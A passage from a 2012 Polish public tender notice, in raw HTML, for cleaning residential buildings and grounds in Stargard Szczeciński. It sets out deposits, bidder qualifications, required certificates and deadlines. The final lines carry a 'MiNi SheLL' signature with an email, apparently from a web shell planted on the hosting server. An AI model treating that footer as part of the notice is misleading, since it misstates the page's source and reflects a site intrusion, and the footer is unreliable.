Jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust.3 ustawy Pzp nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust. Pzp lub pełnomocnictw,
Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn lezących po stronie wykonawcy.
Wadium w formie pieniężnej winno wpłynąć przed terminem składania ofert  na rachunek     zamawiającego w Banku PEKAO S.A. O/Stargard Szczeciński nr 
10 1240 3901 1111 0000 4220 4466
 i opisywać odpowiednio:
-Wadium przetarg sprzątanie wewnątrz budynków mieszkalnych i utrzymanie w czystości przylegających do nich terenów zewnętrznych ZADANIE NR - wpisać odpowiednie zadanie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje sposobu oceniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku wykonawca obowiązany jest wykazać:
Wykonanie usług w okresie ostatnich trzech  lat, jeżeli okres prowadzenia działalności jest krótszy- w tym okresie , odpowiadających swoim rodzajem i wielkością  usługom stanowiącym przedmiot zamówienia, Zamawiający rozumie przez to sprzątanie wewnątrz budynków mieszkalnych  i przylegających do nich terenów zewnętrznych  o łącznej wartości usług w ciągu każdego miesiąca  na kwotę co najmniej 
a-9 000,00 zł brutto i łącznej  powierzchni sprzątanej budynków co najmniej 8 000m2  i terenów zewnętrznych 26 000 m2  w odniesieniu do ZADANIA NR 1,
b-2 800,00zł brutto i łącznej  powierzchni sprzątanej budynków co najmniej 1000 m2  i terenów zewnętrznych 9 600 m2  w odniesieniu do ZADANIA NR 2
c-3 000,00 zł brutto i łącznej  powierzchni sprzątanej co najmniej 3 500,00 m2  w odniesieniu do ZADANIA NR 3,
z podaniem ich wartości oraz dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że  te usługi zostały wykonane lub są wykonywane należycie ( np. faktury wraz z referencjami lub umowy wraz z referencjami)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje sposobu oceniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą się średniomiesięcznym zatrudnieniem na poziomie co najmniej 8 osób w odniesieniu do ZADANIA NR 1 , w odniesieniu do ZADANIA NR 2 co najmniej 3 , 3 osób w odniesieniu do ZADANIA NR 3 w okresie ostatnich trzech lat, a  w przypadku gdy okres prowadzenia działalności jest krótszy  w tym okresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w szczególności wykażą, że posiadają środki finansowe lub zdolność kredytową w kwocie co najmniej 5 cyfrowej w pełnych złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany w treści umowy o udzielenie niniejszego zamówienia wyłącznie w sytuacji :
a-zmiany powierzchni sprzątanej dotyczącej tylko i wyłącznie adresów wg załącznika nr 6, 6a, 6b wynikającej z tego zmiany wynagrodzenia
b-zmiany wynagrodzenia raz w roku,  o wskaźnik wzrostu cen towarów i usług konsumpcyjnych opublikowany przez Prezesa GUS za poprzedni rok kalendarzowy. Zmiana wysokości cen, nie może przekroczyć jednak planowanego na dany rok wskaźnika inflacji, publikowanego w ustawie budżetowej na dany rok. 
c-zmiany wynagrodzenia brutto, w przypadku zmiany przepisów obowiązujących dotyczących podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.  z o.o., ul. A. Struga 29, 73-110 Stargard Szczeciński,pokój nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 09:00, miejsce: Stargardzkie Towarzystwo Budownictwa Społecznego Sp.  z o.o., ul. A. Struga 29, 73-110 Stargard Szczeciński,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com